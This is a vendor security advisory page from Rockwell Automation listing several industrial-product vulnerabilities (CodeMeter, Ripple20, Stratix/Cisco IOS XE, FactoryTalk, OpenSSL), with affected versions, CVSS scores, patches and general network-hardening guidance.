Rockwell Automation is impacted by advisory ICSA-21-210-02 which contains two vulnerabilities targeting Wibu-Systems AG. These vulnerabilities impact FactoryTalk^® Activation Manager and Studio 5000 Logix Designer^®. If successfully exploited, these vulnerabilities may allow the reading of data from the heap of the CodeMeter Runtime network server or result in a crash of the CodeMeter Runtime Server (i.e., CodeMeter.exe).

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

FactoryTalk® Activation Manager v4.00 to v4.05.02
- Includes Wibu-Systems AG CodeMeter v7.20a and earlier
Studio 5000 Logix Designer® v23.00.01 to v33.00.02

Vulnerability Details

CVE-2021-20093: CWE-126

FactoryTalk Activation Manager and Studio 5000 Logix Designer: An issue exists in the Wibu-Systems AG CodeMeter Runtime that allows a remote, unauthenticated attacker to send a specially crafted packet, which could result in crashing the server or direct the CodeMeter Runtime Network Server to send back packets containing data from the heap.

Wibu-Systems AG score:

CVSS v3.1 Base Score: 9.1/10 Critical
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

CVE-2021-20094: CWE-126

Factory Talk Activation Manager and Studio 5000 Logix Designer: An issue exists in the Wibu-Systems CodeMeter Runtime that allows a remote, unauthenticated attacker to send a specially crafted packet, which could result in crashing the server or direct the CodeMeter Runtime CmWAN server to send back packets containing data from the heap

Wibu-Systems AG score:

CVSS v3.1 Base Score: 7.5/10 HIGH
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

-------------------UPDATE: 22 Nov 2022----------------------

CVE-2021-41057: CWE-269

A local attacker could cause a Denial of Service by overwriting existing files on the affected system.

Wibu-Systems AG Score:
CVSS V3.1 Base Score: 7.1/10 HIGH
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Risk Mitigation & User Action

Customers using the affected FactoryTalk® Activation Manager and/or Studio 5000 Logix Designer® are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

Vulnerability	Suggested Actions
CVE-2021-20093	Update to Factory Talk Activation Manager 4.05.03 or later For compatibility details about FactoryTalk Activation Manager, customers can consult the Product Compatibility and Download Center, Standard Views -> Software Latest Versions -> FactoryTalk Activation
CVE-2021-20094	Update to Factory Talk Activation Manager 4.05.03 or later
CVE-2021-41057	Update to Factory Talk Activation Manager 4.06.11 or later

Customers may update Wibu-Systems CodeMeter independently for FactoryTalk Activation Manager or Studio 5000 Logix Designer® by installing Wibu-Systems CodeMeter AG v7.30a. Please refer to this support page to determine if Wibu-Systems CodeMeter AG v7.30a is compatible with the installed versions of Rockwell Automation software.

During installation, Rockwell Automation products bind CodeMeter Runtime to the Local Host adapter and the Network Server and CmWAN Server ports are disabled. Therefore, if the default installation is not modified, Rockwell Automation software is not susceptible to these vulnerabilities over a network connection. Default port 22350 is required if activation licenses are hosted from the machine.

Customers using the affected software are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy.

General Security Guidelines

Utilize proper network infrastructure controls, such as firewalls, to help ensure that Wibu CodeMeter Network Server and CmWAN Server (Default Port# 22350/TCP and 22351/TCP) are blocked from unauthorized sources.

Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
Use of Microsoft AppLocker or other similar allow list application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article QA17329 - Using Rockwell Automation Software Products with AppLocker.
Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to UDP Port# 2222 (CIP), TCP/UDP Port# 44818 (CIP), and TCP/UDP Port# 2221 (CIP Security) using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see Knowledgebase Article BF7490 - TCP/UDP Ports Used by Rockwell Automation Products.
Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
Locate control system networks and devices behind firewalls and isolate them from the business network.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the KnoweldgeBase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

Critical

PN1508 | Treck Ripple20 TCP/IP Vulnerabilities Affect Multiple Rockwell Automation Products

Published Date:

November 01, 2022

Last Updated:

August 15, 2025

CVE IDs:

CVE-2020-11914, CVE-2020-11910, CVE-2020-11901, CVE-2020-11907, CVE-2020-11911, CVE-2020-11912, CVE-2020-25066, CVE-2020-11906

Products:

Flex I/O, 1408 PowerMonitor 1000, 1732E ArmorBlock I/O, 1426 PowerMonitor 5000

CVSS Scores (v3.1):

9.8, 9.1, 5.0, 3.7, 3.1

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

Yes

More Details Less Details

Revision Number

8.0

Revision History

Version 8.0 - Ausgust 15, 2025 Updated Kinetix vulnerability discrepancies

Version 7.0 - August 8, 2025 Updated affected products list and user actions

Version 6.0 – August 13, 2024. Updated affected products list and user actions

Version 5.0 – November 1, 2022. Added patch information for additional products
Version 4.0 – May 17, 2022. Updated patch information for PowerFlex 755T and 6000T
Version 3.0 – February 9, 2021. Updated for ICSA-20-353-01.
Version 2.1 - January 13, 2021. Updated to reflect additional disclosure.
Version 2.0 - July 15, 2020. Updated table to reflect affected products and versions.
Version 1.0 - June 16, 2020. Initial Release.

Executive Summary

Treck, a real-time embedded Internet Protocol software vendor, reported several vulnerabilities (named "Ripple20") to Rockwell Automation that were discovered by security researchers at JSOF, a security vendor and research organization. The embedded TCP/IP stack (versions earlier than 6.0.1.66) from Treck is used by many different technology vendors including Rockwell Automation. These vulnerabilities, if successfully exploited, may result in remote code execution, denial-of-service, or sensitive information disclosure.

Begin Update 3.0
On December 18, 2020, Treck reported four additional vulnerabilities that were discovered by security researchers at Intel. The following components of the embedded TCP/IP stack (versions 6.0.1.67 and prior) are affected: HTTP Server, IPv6, and DCHPv6. These vulnerabilities, if successfully exploited, may result in denial-of-service conditions or remote code execution.
End Update 3.0

Since this disclosure is part of a large multi-party coordination effort with the CERT/CC

and ICS-CERT, not every vulnerability reported by Treck impacts Rockwell Automation. Please see the table under Affected Products for a full list of the affected Rockwell Automation products and the corresponding CVE ID.

Customers using affected products are encouraged to evaluate their own systems and apply the appropriate risk mitigations from those listed below. Additional details relating to the discovered vulnerabilities and recommended countermeasures, are provided herein.

Affected Products

Affected Product Family

Affected Versions

CVE-2020-XXXXX

11896

11897

11898

11899

11900

11901

11902

11903

11904

11905

11906

11907

11908

11909

11910

11911

11912

11913

11914

5094-AEN2SFPR/XT
5094-AEN2TR/XT
5094-AENSFPR/XT
5094-AENTR/XT

1.011-4.011

X

5069-AENTR

3.011-4.011

X

1734-AENT/R

4.001- 6.012

X

1738-AENT/R

4.001- 6.012

X

1732E-16CFGM12R
1732E-8X8M12DR
1732E-IB16M12DR
1732E-IB16M12R
1732E-OB16M12DR
1732E-OB16M12R

2.011-2.012

X

1791ES-ID2SSIR

1.001

1799ER-IQ10XOQ10

2.011

X

1794-AENTR/XT

1.011-1.017

X

1732E-12X4M12QCDR
1732E-16CFGM12QCR
1732E-16CFGM12QCWR
1732E-12X4M12P5QCDR
1732E-16CFGM12P5QCR

1.011-1.015

X

1732E-16CFGM12P5QCWR

1.011-2.011

X

PowerMonitor^™ 5000

4.19

X

PowerMonitor 1000

4.10

X

ArmorStart^®ST+ Motor Controller

1.001

X

Kinetix® 5500

All*

X

Kinetix® 5700

All*

X

Kinetix® 5100

1.001

X

PowerFlex 755T
PowerFlex 6000T

All*

X

CIP Safety^™ Encoder

All*

X

Begin Update 3.0:

Affected Product Family	Affected Versions	CVE
1734-AENT/R	4.001- 6.012	CVE-2020-25066
1738-AENT/R	4.001- 6.012	CVE-2020-25066
1794-AENTR 1794-AENTR/XT	1.011- 1.017	CVE-2020-25066
1732E-16CFGM12R 1732E-8X8M12DR 1732E-IB16M12DR 1732E-IB16M12R 1732E-OB16M12DR 1732E-OB16M12R	2.011-2.012	CVE-2020-25066
1799ER-IQ10XOQ10	2.011	CVE-2020-25066
1732E-12X4M12QCDR 1732E-16CFGM12QCR 1732E-16CFGM12QCWR 1732E-12X4M12P5QCDR 1732E-16CFGM12P5QCR	1.011-1.015	CVE-2020-25066
1732E-16CFGM12P5QCWR	1.011-2.011	CVE-2020-25066
PowerMonitor^™ 5000	4.19	CVE-2020-25066
PowerMonitor 1000	4.10	CVE-2020-25066

End Update 3.0

Begin Update 6.0

Affected Product Family

Affected Versions

CVE

PowerFlex 527

all

CVE-2020-25066

End Update 6.0

Vulnerability Details

Begin Update 3.0:
CVE-2020-25066
A vulnerability in the Treck HTTP Server components allow an attacker to cause denial-of-service condition. This vulnerability may also result in arbitrary code execution.

CVSSv3.1 Score: 9.8/CRITICAL
CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
End Update 3.0

CVE-2020-11901
There is an improper input validation issue in the DNS resolver component when handling a sent packet. A remote, unauthenticated attacker may be able to inject arbitrary code on the target system using a maliciously crafted packet.

CVSSv3.1 Score: 9.1/CRITICAL
CVSS Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2020-11906
There is an improper input validation issue in the Ethernet Link Layer component. An adjacent, unauthenticated attacker can send a malicious Ethernet packet that can trigger an integer underflow event leading to a crash or segment fault on the target device.

CVSSv3.1 Score: 5.0/MEDIUM
CVSS Vector String: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

CVE-2020-11907
There is an improper handling of length parameter consistency issue in the TCP component. A remote, unauthenticated, attacker can send a malformed TCP packet that can trigger an integer underflow event leading to a crash or segmentation fault on the device.

CVSSv3.1 Score: 5.0/MEDIUM
CVSS Vector String: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

CVE-2020-11910
There is an improper input validation issue in the ICMPv4 component. A remote, unauthenticated attacker can send a malicious packet that may expose data present outside the bounds of allocated memory.

CVSSv3.1 Score: 3.7/LOW
CVSS Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

CVE-2020-11911
There is an improper access control issue in the ICPMv4 component. A remote, unauthenticated attacker can send a malicious packet that can lead to higher privileges in permissions assignments for some critical resources on the destination device.

CVSSv3.1 Score: 3.7/LOW
CVSS Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

CVE-2020-11912
There is an improper input validation issue in the IPv6 component. A remote, unauthenticated attacker can send a malicious packet that may expose some data that is present outside the bounds of allocated memory.

CVSSv3.1 Score: 3.7/LOW
CVSS Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

CVE-2020-11914
There is an improper input validation issue in the ARP component. An unauthenticated, local attacker can send a malicious Layer-2 ARP packet that could lead to unintended exposure of some sensitive information on the target device.

CVSSv3.1 Score: 3.1/LOW
CVSS Vector String: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

Update 2.1: Rockwell Automation is aware of the additional Treck TCP/IP Stack vulnerabilities disclosed (ICSA-20-353-01). Potential impact of these vulnerabilties is currently being investigated and this advisory will be updated when the investigation concludes.

Risk Mitigation & User Action

Currently, Rockwell Automation is working to address these vulnerabilities and will continue to provide updates as these fixes become available. Please subscribe to updates to this advisory and the Industrial Security Advisory Index (Knowledgebase ID 54102) to stay notified.

CVE

Suggested Actions

CVE-2020-11901
CVE-2020-11906
CVE-2020-11907
CVE-2020-11910
CVE-2020-11911
CVE-2020-11912
CVE-2020-11914

For successful exploitation, these vulnerabilities require malformed TCP/IP packets to reach the destination device and an active network connection. To reduce risk, customers should ensure they are employing proper network segmentation and security controls. Specifically, network exposure for all control system devices should be minimized, and control systems should be behind firewalls and isolated from other networks when possible. Refer to the Converged Plantwide Ethernet (CPwE) Design and Implementation Guide for best practices deploying network segmentation and broader defense-in-depth strategies.

The CERT/CC has provided IDS rules to support additional mitigations for these vulnerabilities. These rules can be found on their Github page.

ICS-CERT has provided additional network mitigations in their public disclosure.

Begin Update 3.0:

CVE	Suggested Actions
CVE-2020-25066	Follow suggested actions above and, when possible, implement firewall rules to filter out packets that contain a negative content length in the HTTP header. ICS-CERT has provided additional network mitigations in their public disclosure.

End Update 3.0

Available Fixes:

Update 8.0 August 15, 2025

CVE

Affected Product

Suggested Actions

CVE-2020-11901
CVE-2020-11906
CVE-2020-11907
CVE-2020-11910
CVE-2020-11911
CVE-2020-11912

1794-AENTR/XT

Apply firmware v2.011 or later

(Download).

CVE-2020-11901
CVE-2020-11906
CVE-2020-11907
CVE-2020-11910
CVE-2020-11911
CVE-2020-11912

1738-AENT

1738-AENTR

Apply firmware v6.011 or later

(Download).

CVE-2020-11901
CVE-2020-11906
CVE-2020-11907
CVE-2020-11910
CVE-2020-11911
CVE-2020-11912

1734-AENT/K

1734-AENTR/K

Apply firmware

-v5.019 or later for series B

(Download).

-v7.011 or later for series C

(Download).

CVE-2020-11901
CVE-2020-11906
CVE-2020-11907
CVE-2020-11910
CVE-2020-11911
CVE-2020-11912

5069-AENTR

Apply firmware v4.012 or later (Download).

CVE-2020-11901

CVE-2020-11906

CVE-2020-11907

CVE-2020-11910

CVE-2020-11911

CVE-2020-11912

5094-AEN2SFPR/XT

5094-AEN2TR/XT

5094-AENSFPR/XT

5094-AENTR/XT

Apply firmware v5.012 or later (Download).

CVE-2020-11906
CVE-2020-11907
CVE-2020-11910
CVE-2020-11911
CVE-2020-11912

Kinetix 5700

Apply v13 or later (Download).

CVE-2020-11906
CVE-2020-11907
CVE-2020-11910
CVE-2020-11911
CVE-2020-11912

Kinetix 5500

Apply v7.013 or later

(Download).

CVE-2020-11906
CVE-2020-11907
CVE-2020-11910
CVE-2020-11911
CVE-2020-11912

Kinetix 5100

Apply v3.001 or later

(Download).

CVE-2020-11901

CVE-2020-11906

CVE-2020-11907

CVE-2020-11910

CVE-2020-11911

CVE-2020-11912

PowerFlex 755T

PowerFlex 6000T

Apply 6.005 or later for PF755T. Apply R8 or later for PF6000T. (Download)

End Update 8.0 August 15, 2025

Update 7.0 August 7, 2025

CVE

Affected Product Family

Suggested Actions

CVE-2020-25066

1734-AENT/K

1734-AENTR/K

Apply firmware

-v5.019 or later for series B

-v7.011 or later for series C

1738-AENT

1738-AENTR

Apply firmware v6.011 or later

1794-AENTR/XT

Apply firmware v2.011 or later

1732E-16CFGM12R

1732E-8X8M12DR

1732E-IB16M12DR

1732E-IB16M12R

1732E-OB16M12DR

1732E-OB16M12R

Apply firmware 3.011 or later.

1799ER-IQ10XOQ10

Apply firmware 3.011 or later.

1732E-12X4M12QCDR

1732E-16CFGM12QCR

1732E-16CFGM12QCWR

1732E-12X4M12P5QCDR

1732E-16CFGM12P5QCR

Apply firmware 3.011 or later.

1732E-16CFGM12P5QCWR

Apply firmware 3.011 or later.

End Update 7.0

Update Begin 6.0

CVE-2020-25066

PowerFlex 527

Follow suggested actions above

and, when possible, implement

firewall rules to filter out packets

that contain a negative content

length in the HTTP header.

End Update Begin 6.0

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products

Utilize proper network infrastructure controls, such as firewalls, to help ensure that ICMPv4, TCP, ARP and DNS traffic originating from unauthorized sources is blocked.
Ensure that software-based firewalls are running with current rule sets and enforced on individual systems.

Software/PC-based Mitigation Strategies

Use of Microsoft^® AppLocker or other similar whitelisting application can help mitigate risk. Information on using AppLocker with Rockwell Automation^® products is available at QA17329 - Using Rockwell Automation Software Products with AppLocker
Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

General Mitigations
Use trusted software, software patches antivirus/antimalware programs and interact only with trusted websites
and attachments.

Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
Locate control system networks and devices behind firewalls and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

See our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

PN1607 | PN1607 | New Open SSL Vulnerability

Published Date:

October 31, 2022

Last Updated:

October 31, 2022

Products:

FactoryTalk View

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Executive Summary

Rockwell Automation is aware of and currently monitoring the Open SSL vulnerability that was initially announced on Tuesday, October 25th. On Tuesday, November 1st the full vulnerability details were disclosed, and a patch was made available by the vendor. As part of our commitment to transparency and to protecting our customers’ security, we are evaluating all Rockwell products for this third-party vulnerability. If any products are affected by this vulnerability, we will provide an update to this notification. We look forward to working with our customers to satisfy any concerns they may have.

High

PN1601 | PN1601 | Stratix Products Vulnerable to Multiple Vulnerabilities

Published Date:

October 27, 2022

Last Updated:

October 27, 2022

CVE IDs:

CVE-2020-3209, CVE-2020-3200, CVE-2021-1385, CVE-2020-3516, CVE-2021-1446

Products:

Stratix 5400 Industrial Ethernet Switch, Stratix 5800 Switch, Stratix 5410 Ind Distribution Switch

CVSS Scores:

6.8, 7.2, 8.8, 6.5, 7.7, 8.6, 4.3

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Version 1.0 –October 27,2022

Executive Summary

Rockwell Automation is aware of multiple vulnerabilities that impact Cisco IOS® XE and Cisco IOS software contained within Stratix® devices. Exploitation of these vulnerabilities could potentially lead to, but are not limited to, a denial-of-service condition and remote code execution.

Customers using affected versions of this software are encouraged to evaluate the following mitigations and apply them where appropriate. Additional details relating to the discovered vulnerability, including the products in scope, impact, and recommended countermeasures, are provided. We have not received any notice of this vulnerability being exploited in Rockwell Automation products.

Affected Products

Stratix 5800 Switches
Stratix 5400/5410 Switches

Vulnerability Details

CVE 2020-3229 - Cisco IOS XE Software Web UI Privilege Escalation Vulnerability
CVSS Base Score 8.8/10 (High)
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

The administrator GUI lacks correct handing of RBAC, which may allow a malicious user to send modified HTTP requests to the targeted device. If exploited, a read-only remote attacker could potentially execute commands or configuration changes as the administrator user.

CVE 2020-3219 - Cisco IOS XE Software Web UI Command Injection Vulnerability
CVSS Base Score 8.8/10 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Due to insufficient validation of user input, this vulnerability could allow a malicious user to inject custom input into the web UI. If exploited, a remote attacker could potentially execute arbitrary code with administrative privileges on the operating system.

CVE-2021-1446 - Cisco IOS XE Software DNS NAT Protocol Application Layer Gateway Denial-of-Service Vulnerability
CVSS Base Score 8.6/10 (High)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

A vulnerability in the DNS application layer gateway (ALG) functionality used by Network Address Translation (NAT) in Cisco IOS XE software could allow an unauthenticated, remote attacker to cause an affected device to reload.

CVE 2020-3200 - Cisco IOS and IOS XE Software Secure Shell Denial-of-Service Vulnerability
CVSS Base Score 7.7/10 (High)
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

A vulnerability in the Secure Shell (SSH) server code of Cisco IOS software and Cisco IOS XE software could allow an authenticated, remote attacker to cause an affected device to reload.

CVE 2020-3211 - Cisco IOS XE Software Web UI Command Injection Vulnerability
CVSS Base Score 7.2/10 (High)
CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Due to improper input sanitization, this vulnerability could allow a malicious user with administrative privileges to submit specially crafted input in the web UI. If exploited, a remote attacker could potentially execute arbitrary commands with root privileges on the operating system.

CVE 2020-3218 - Cisco IOS XE Software Web UI Remote Code Execution Vulnerability
CVSS Base Score 7.2/10 (High)
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Due to improper validation of user supplied input, a malicious user could potentially create a file on the target device and upload a second malicious file to the device. If exploited, a user could execute arbitrary code with root privileges on the underlying Linux shell.

CVE-2020-3209 - Cisco IOS XE Software Digital Signature Verification Bypass Vulnerability
CVSS Base Score 6.8/10 (Medium)
CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

The root cause of this vulnerability is an improper check on the area code that manages the verification of the digital signatures of the system files during the initial boot process. If exploited, a malicious user could potentially install and boot malicious software image or execute unsigned binaries on the targeted device. A malicious user could exploit this vulnerability by loading unsigned software on the affected device.

CVE-2021-1385 - Cisco IOx Application Environment Path Traversal Vulnerability
CVSS Base Score 6.5/10 (Medium)
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N

A vulnerability in the Cisco IOx application hosting environment of multiple Cisco platforms could allow an authenticated, remote attacker to conduct directory traversal attacks and read and write files on the underlying operating system or host system.

CVE 2020-3516 – Cisco IOS XE Software Web UI Improper Input Validation Vulnerability
CVSS Base Score 4.3/10 (Medium)
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

A vulnerability in the web server authentication of Cisco IOS XE Software could allow an authenticated, remote attacker to crash the web server on the device.

Risk Mitigation & User Action

This vulnerability has been addressed in newer versions of the Stratix 5800 switch. Customers are also directed towards the risk mitigations provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

Products Affected	Vulnerabilities	Suggested Actions
Stratix 5800 switches	CVE-2020-3209	Update to Stratix 5800 v.17.04.01 or later
	CVE 2020-3211
	CVE 2020-3218
	CVE 2020-3229
	CVE 2020-3219
	CVE-2020-3516
	CVE 2021-1385
	CVE-2021-1446
Stratix 5800 switches	CVE-2020-3200	Update to v16.12.01 or later
Stratix 5400/5410 switches	CVE-2020-3200	Update to v15.2(7)E2 or later

Additionally, please see our Knowledgebase article, QA43240 - Recommended Security Guidelines from Rockwell Automation, for additional recommendations to maintain the security posture of your environment.

References

High

PN1605 | FactoryTalk Alarm and Events Server Vulnerable to Denial-Of-Service Attack

Published Date:

October 27, 2022

Last Updated:

October 16, 2024

CVE IDs:

CVE-2022-38744

Products:

FactoryTalk View SE, Studio 5000 View Designer

CVSS Scores (v3.1):

7.5

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

Yes

More Details Less Details

Revision History

Version 1.0 – October 27, 2022

Executive Summary

Rockwell Automation received a report from Kaspersky Labs regarding one vulnerability in FactoryTalk® Alarms and Events servers. If successfully exploited, these vulnerabilities may result in a denial-of-service condition causing the server to be unavailable.

Customers using affected versions of this software are encouraged to evaluate the following mitigations and apply them appropriately to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided.

Affected Products

FactoryTalk Alarms and Events server – All versions

Vulnerability Details

CVE-2022-38744 FactoryTalk Alarm and Events server vulnerable to denial-of-service attack
An unauthenticated attacker with network access to a victim's FactoryTalk service could open a connection, causing the service to fault and become unavailable. The affected port can be used as a server ping port and use messages structured with XML.

CVSS v3.1 Base Score: 7.5/10[MEDIUM]
CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Risk Mitigation & User Action

Customers using the affected software are encouraged to set up the secondary mitigation as described below that addresses the associated risk. Customers are also directed towards general risk mitigation strategies provided in QA43240 - Recommended Security Guidelines from Rockwell Automation , in our Knowledgebase.

Vulnerability	Suggested Actions
CVE-2022-38744	Customers should set up IPsec to mitigate this issue as detailed in QA46277 - Deploying FactoryTalk Software with IPsec

General Security Guidelines

General security guidelines can be found in QA43240 - Recommended Security Guidelines from Rockwell Automation .

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).

Additional Links

Critical

PN1606 | PN1606 | Factory Talk VantagePoint Software Broken Access Control and Input Validation Vulnerability

Published Date:

October 07, 2022

Last Updated:

October 07, 2022

CVE IDs:

CVE-2022-3158, CVE-2022-38743

Products:

FactoryTalk Linx OPC UA Connector

CVSS Scores:

9.9

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 – October 06,2022

Executive Summary

Rockwell Automation is aware of a broken access control and input validation vulnerability. If exploited, this vulnerability could potentially lead to a high impact on the confidentiality, a low impact on the integrity, and the availability of FactoryTalk® VantagePoint® software.

Customers using affected versions of this software are encouraged to evaluate the following mitigations and apply them where appropriate. Additional details relating to the discovered vulnerability, including the products in scope, impact, and recommended countermeasures, are provided. We have not received any notice of this vulnerability being exploited in Rockwell Automation products.

Affected Products

FactoryTalk VantagePoint software v. 8.0, 8.10, 8.20, 8.30, 8.31

Vulnerability Details

CVE 2022-38743 FactoryTalk VantagePoint Software Broken Access Control Vulnerability
As a part of our commitment to security, Rockwell Automation performs routine testing and vulnerability scanning to maintain the security posture of products. Due to penetration testing, we discovered a broken access control vulnerability. The FactoryTalk VantagePoint SQLServer account could allow a malicious user with read-only privileges to execute SQL statements in the back-end database.

CVE 2022-38743
CVSS Base Score: 9.9/10 (Critical)
CVSS:3.1 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CVE 2022-3158 FactoryTalk VantagePoint Software Input Validation Vulnerability
Additionally, the device lacks input validation when users enter SQL statements to retrieve information from the back-end database. This vulnerability could potentially allow a user with basic user privileges to perform remote code execution on the server.

CVE 2022-3158
CVSS Base Score: 9.9/10 (Critical)
CVSS:3.1 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

Customers using the affected software are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are encouraged to apply the following configurable risk mitigations to help reduce the risk associated with this vulnerability. We also recommend customers combine risk mitigations with security best practices to employ a defense in depth approach.

Mitigation A	Update to FactoryTalk VantagePoint V8.00/8.10/8.20/8.30/8.31 or later. BF28452 - Patch: Multiple issues, FactoryTalk VantagePoint 8.00/8.10/8.20/8.30/8.31
Mitigation B	If customers are unable to update the firmware, we suggest customers configure the database to follow the least privilege principle.

Additional Links

High

PN1595 | PN1595 | OpenSSL Infinite Loop in Rockwell Automation Products

Published Date:

September 23, 2022

Last Updated:

January 28, 2025

CVE IDs:

CVE-2022-0778

CVSS Scores:

7.5, 4.9

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

Yes

More Details Less Details

Revision History

Version 1.2 - 28-Jan-2025, Updated Impacted Products (Stratix 4300)

Version 1.1 – 8-Sept-2022, Updated Suggested Actions

Executive Summary

Rockwell Automation received a report on a new vulnerability within OpenSSL, which is used within some of our products. This vulnerability can lead to a denial-of-service within the affected products if successfully launched by an attacker.

Customers using affected versions of this software are encouraged to evaluate the following mitigations provided and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided in this security advisory.

Affected Products

ThinManager® software (Versions 12.0.0 - 12.0.2, 12.1.0 - 12.1.3)
FactoryTalk® Linx Gateway (Version 6.30 and earlier)
Factory Talk Linx OPC UA Connector (Version 6.30 and earlier)
Factory Talk View (Version 11.00 - Version 13.00)
Stratix 4300 (Versions 4.0.1.117 and earlier)

Vulnerability Details

CVE-2022-0778 Open SSL allows for an infinite loop

This vulnerability causes the OpenSSL library to enter an infinite loop when parsing an invalid certificate and can result in a denial-of-service (DoS) to the application. An attacker does not need a verified certificate to exploit this vulnerability because parsing a bad certificate triggers the infinite loop before the verification process is completed.

CVSS v3.1 Base Score: 7.5/10[HIGH]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2022-0778 Open SSL allows for an infinite loop (*This CVE score only applies to ThinManager)

